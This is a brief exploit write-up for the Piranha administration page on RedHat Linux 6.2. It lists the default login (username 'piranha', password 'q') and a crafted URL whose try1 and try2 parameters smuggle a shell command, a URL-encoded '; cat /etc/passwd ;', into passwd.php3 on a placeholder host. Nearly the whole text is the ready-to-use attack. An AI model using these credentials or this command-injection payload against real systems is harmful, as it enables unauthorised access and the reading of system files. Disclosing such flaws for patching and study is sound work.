Exploit:
The default username and password are:
piranha, and q, respectively.
Affected:
RedHat Linux 6.2 i386
Execute the following url, using a
username and password to authenticate:
http://victim.example.com/piranha/secure/passwd.php3
Next, execute the following: (all in 1 line)
http://victim.example.com/piranha/secure/passwd.php3?
try1=g23+%3B+cat+%2Fetc%2Fpasswd+%3B&try2=g23+%3B+
cat+%2Fetc%2Fpasswd+%3B&passwd=ACCEPT